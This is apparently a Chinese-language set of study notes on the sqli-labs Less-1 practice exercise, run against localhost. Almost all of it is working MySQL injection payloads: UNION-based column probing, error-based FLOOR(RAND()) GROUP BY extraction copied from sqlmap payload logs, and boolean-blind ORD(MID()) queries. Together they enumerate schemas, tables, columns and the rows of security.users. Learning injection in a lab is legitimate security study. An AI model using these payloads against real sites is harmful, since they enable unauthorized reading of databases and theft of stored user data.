目标
http://localhost/?id=2
http://localhost/?id=2' 有回显错误

Error-based injection

猜解列数,因为在GET请求中,所以要用%23代替#

http://localhost/sqli/Less-1/?id=2' UNION ALL SELECT NULL,NULL,NULL%23

返回正常,确定列数为3

判断回显在哪个位置,用CONCAT(0x61,0x62,0x63)以此取代NULL

http://localhost/sqli/Less-1/?id=-2' UNION ALL SELECT NULL, concat(0x61,0x62,0x63),NULL%23

页面中出现回显

PS:有时也采用这种方法:http://localhost/sqli/Less-1/?id=2' UNION ALL SELECT NULL, concat(0x61,0x62,0x63),NULL%23

于是我们可以使用如下PAYLOAD获取一些信息

http://localhost/sqli/Less-1/?id=-2' UNION ALL SELECT NULL, [QUERY HERE],NULL%23
http://localhost/sqli/Less-1/?id=-2' UNION ALL SELECT NULL, version(),NULL%23
Attack vector:
AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

获取数据库总数
字符型:

http://localhost/sqli/Less-1/?id=-6021' UNION ALL SELECT NULL,CONCAT(0x71766a6271,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x7176787a71),NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

数字型:

[23:42:32] [PAYLOAD] 1 AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x71706b6271,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)

http://localhost/sqli/Less-1/?id=2' AND (SELECT 3770 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fFqF'='fFqF

获取数据库名称,标红的地方是偏移量,即第几个数据库

[23:12:22] [PAYLOAD] 2' AND (SELECT 2968 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IeIo'='IeIo

获取表的数量,标红的地方是数据库名

[23:23:12] [PAYLOAD] 2' AND (SELECT 9361 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xlSl'='xlSl

获取表名,标红的地方是偏移量,即第几张表

[23:23:12] [PAYLOAD] 2' AND (SELECT 8267 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 3,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'aHHQ'='aHHQ

获取列的数量,标红1为表明,标红2位数据库名

[23:29:07] [PAYLOAD] 2' AND (SELECT 8220 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'btHc'='btHc

获取列名

[23:29:07] [PAYLOAD] 2' AND (SELECT 2340 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uKNV'='uKNV

获取列的类型

[23:29:07] [PAYLOAD] 2' AND (SELECT 1078 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HJtM'='HJtM

获取表共有多少行

[23:34:04] [PAYLOAD] 2' AND (SELECT 9821 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(id) AS CHAR),0x20) FROM security.users),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'jvPy'='jvPy

获取内容

[23:34:04] [PAYLOAD] 2' AND (SELECT 5792 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,50) FROM security.users ORDER BY id LIMIT 0,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qGtS'='qGtS

Boolean-Blind Injection

猜解数据库数量,标红的地方表示这个数字的第几位

ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>49 AND 'nTcW'='nTcW

猜解数据库名称,红色部分表示数据库,蓝色部分表示数据库名字的偏移

ID:1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>64 AND 'RFNY'='RFNY

猜解表的数量,红色部分为数据库名,蓝色部分为这个数字的偏移量

ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),1,1))>51 AND 'HkNZ'='HkNZ

猜解表名

ID:1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>64 AND 'GKOZ'='GKOZ